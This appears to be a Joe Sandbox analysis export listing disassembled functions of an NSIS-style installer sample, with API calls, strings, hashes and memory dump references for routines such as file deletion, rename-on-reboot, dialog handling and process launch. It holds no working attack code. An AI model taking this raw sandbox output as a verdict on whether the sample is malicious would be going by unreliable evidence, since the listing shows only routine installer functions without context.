API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Non-executed Functions

Function 00406CB1 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 00406CCE
lstrcatW.KERNEL32(007DB150,\*.*), ref: 00406D1F
lstrcatW.KERNEL32(?,00408838), ref: 00406D3F
lstrlenW.KERNEL32(?), ref: 00406D42
FindFirstFileW.KERNEL32(007DB150,?), ref: 00406D56
FindNextFileW.KERNEL32(?,?,000000F2,?), ref: 00406E38
FindClose.KERNEL32(?), ref: 00406E49

Strings

RMDir: RemoveDirectory failed("%s"), xrefs: 00406EC6
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EA9
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DF6
\*.*, xrefs: 00406D19
Delete: DeleteFile("%s"), xrefs: 00406DD2
Delete: DeleteFile failed("%s"), xrefs: 00406E13
RMDir: RemoveDirectory("%s"), xrefs: 00406E85
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E6E

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 4b1b557670e2683e68bec861c381546d6e6092d77848359203819f0ab52b989c
Instruction ID: 0e06370173042cf1970d3b282d3fdac29725624d265da3f13fe54d6ba55e86a8
Opcode Fuzzy Hash: 4b1b557670e2683e68bec861c381546d6e6092d77848359203819f0ab52b989c
Instruction Fuzzy Hash: EE51F435904305AACB217B65CD46ABF37B8DF41724F16813FF902751C1DB3C49A29AAD

Function 0040681B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00428550,0041F150,00000000), ref: 004068EC
GetSystemDirectoryW.KERNEL32(007E0D60,00002004), ref: 0040696E

Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C

GetWindowsDirectoryW.KERNEL32(007E0D60,00002004), ref: 00406981
lstrcatW.KERNEL32(007E0D60,\Microsoft\Internet Explorer\Quick Launch), ref: 004069FB
lstrlenW.KERNEL32(007E0D60,007B9A60,?,00000000,00404FBF,007B9A60,00000000,00428550,0041F150,00000000), ref: 00406A5D

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069F5
`~, xrefs: 00406A69
`~, xrefs: 00406842
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040693C

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$`~$`~
API String ID: 3581403547-450655766
Opcode ID: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
Instruction ID: f0e19f9528a57ac158c9a3c92ca4e3ea7bb27298c0fdca1021e2216b23c4434f
Opcode Fuzzy Hash: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
Instruction Fuzzy Hash: 9771F3B1A00215EBDF20AF69CC456BA3774AB55714F12C03FE902BA2D0D73D89A1DF99

Function 0040548F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054CB
ShowWindow.USER32(?), ref: 004054E8
DestroyWindow.USER32 ref: 004054FC
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405518
GetDlgItem.USER32(?,?), ref: 00405539
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040554D
IsWindowEnabled.USER32(00000000), ref: 00405554
GetDlgItem.USER32(?,00000001), ref: 00405603
GetDlgItem.USER32(?,00000002), ref: 0040560D
SetClassLongW.USER32(?,000000F2,?), ref: 00405627
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405678
GetDlgItem.USER32(?,00000003), ref: 0040571E
ShowWindow.USER32(00000000,?), ref: 00405740
EnableWindow.USER32(?,?), ref: 00405752
EnableWindow.USER32(?,?), ref: 0040576D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405783
EnableMenuItem.USER32(00000000), ref: 0040578A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057A2
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057B5
lstrlenW.KERNEL32(007C5A78,?,007C5A78,007E95E0), ref: 004057DE
SetWindowTextW.USER32(?,007C5A78), ref: 004057F2
ShowWindow.USER32(?,0000000A), ref: 00405926

Strings

xZ|, xrefs: 004057CF

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: xZ|
API String ID: 184305955-3158599731
Opcode ID: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
Instruction ID: faf43565c4180cbf528e331297302c0a9f4643a65f382e9c74acaf045be3f04a
Opcode Fuzzy Hash: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
Instruction Fuzzy Hash: A3C19C71401A04FFCB216F61EE89E2B3B69EB49345F40853EF642B52F0CA3A98519F1D

Function 00406AAF Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(007D9B00,NUL), ref: 00406ABF
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00406CA6,?,?,00000001,00406EC4,?,00000000,000000F1,?), ref: 00406ADE
GetShortPathNameW.KERNEL32(?,007D9B00,00000400), ref: 00406AE7

Part of subcall function 00405DCC: lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
Part of subcall function 00405DCC: lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E

GetShortPathNameW.KERNEL32(?,007DF158,00000400), ref: 00406B08
WideCharToMultiByte.KERNEL32(00000000,00000000,007D9B00,000000FF,007DA300,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B31
WideCharToMultiByte.KERNEL32(00000000,00000000,007DF158,000000FF,007DA950,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B49
wsprintfA.USER32 ref: 00406B63
GetFileSize.KERNEL32(00000000,00000000,007DF158,C0000000,00000004,007DF158,?), ref: 00406B9B
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BAA
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BC6
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BF6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007DAD50,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C4D

Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C61
GlobalFree.KERNEL32(00000000), ref: 00406C68
CloseHandle.KERNEL32(?), ref: 00406C72

Strings

NUL, xrefs: 00406AB4
[Rename], xrefs: 00406BDE, 00406BED
%s=%s, xrefs: 00406B59

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 565278875-4148678300
Opcode ID: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
Instruction ID: 9e8937d24cbcc237378a1661f1c9ec94e544457fac856d3cc281a3c4cf2fe410
Opcode Fuzzy Hash: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
Instruction Fuzzy Hash: 80412772108209BFD6202B71DE8CD6B3A6CEF4A754B16053EF286F22D1DA389815867D

Function 004060FD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114
GetFileAttributesW.KERNEL32(007E8D80,?,00000000,00000000,?,?,004062EA,00000000), ref: 00406152
WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 0040618B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 00406197
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 004061B1
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062EA,00000000), ref: 004061B8
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,?,00000000,?,?,004062EA,00000000), ref: 004061CD

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061AB, 004061B0, 004061B7, 004061C6

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
Instruction ID: 63b6af9be1db431a2b362d5c3b596523b37325ffd0be647115a0f8ea25bc4e05
Opcode Fuzzy Hash: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
Instruction Fuzzy Hash: D921C571500244BFD7109F64DE89D9B3728EB01370B11C33AF52ABA1E1D7385D858BAC

Function 00404F88 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007B9A60,00428550,0041F150,00000000), ref: 00404FC0
lstrlenW.KERNEL32(004034C5,007B9A60,00428550,0041F150,00000000), ref: 00404FD0
lstrcatW.KERNEL32(007B9A60,004034C5), ref: 00404FE3
SetWindowTextW.USER32(007B9A60,007B9A60), ref: 00404FF5
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040501B
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405035
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405043

Part of subcall function 0040681B: GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00428550,0041F150,00000000), ref: 004068EC

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
Instruction ID: be30987b008cdac283f352a72c5daf1bc185fc6a717e9f44ce2e47ebc7ce0ac4
Opcode Fuzzy Hash: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
Instruction Fuzzy Hash: BF219D71800118BBCF12AFA5DD849DEBFB8EF45350F10803AFA04B62A0D7794A50DB98

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00053200,00000064,001BA703), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
Instruction ID: 9fbafa62008f9a5ff2b290cb2ce3c23c2df22ed1ca64675581df3bb266551b9d
Opcode Fuzzy Hash: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
Instruction Fuzzy Hash: BB014470610209ABEF109F60DD59FAA3B69FB00349F00803DFA45B91E0DB7896558B58

Function 0040604E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
CharNextW.USER32(?,?,?,00000000), ref: 004060C0
CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9

Strings

*?|<>/":, xrefs: 004060A0

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: a09026506d824dbf9e13ec1e4905f02e05ac7e50fa84eba4f97cb212d859c974
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: 6F11E71185062159DB30EB259C4097BB6F8EE99760752843FE9C6F32C0EB7C8CA1D2BD

Function 0040505D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0040506D

Part of subcall function 00403DC5: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DD7

OleUninitialize.OLE32(00000404,00000000), ref: 004050BB

Part of subcall function 004062B9: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
Part of subcall function 004062B9: wvsprintfW.USER32(00000000,?,?), ref: 004062DD

Strings

Section: "%s", xrefs: 0040508F
Skipping section: "%s", xrefs: 004050CB

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
Instruction ID: 72b980f80c28ecfcd0407e0dace594f9e180666c0886337011194864861aae86
Opcode Fuzzy Hash: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
Instruction Fuzzy Hash: D2F0D1368246009AE2106755BD06B6A77A4DF85711F68403FFF40B22E1DF7D18418AAD

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403719,00000001,?,?,?,00000000,00403A5D,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A5D,?), ref: 0040332E

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
Instruction ID: 97d955eecb999c6cc4ecec0c264b20ab0036741e5c77e3c2fc1849182f84e521
Opcode Fuzzy Hash: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
Instruction Fuzzy Hash: 5BF05E30506620EBC2206FA4FE5CBAB7F68F704B82B41447EF541B12A4CB384951CBDC

Function 00405C55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007D5AB0,Error launching installer), ref: 00405C7A
CloseHandle.KERNEL32(?), ref: 00405C87

Strings

Error launching installer, xrefs: 00405C5E

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
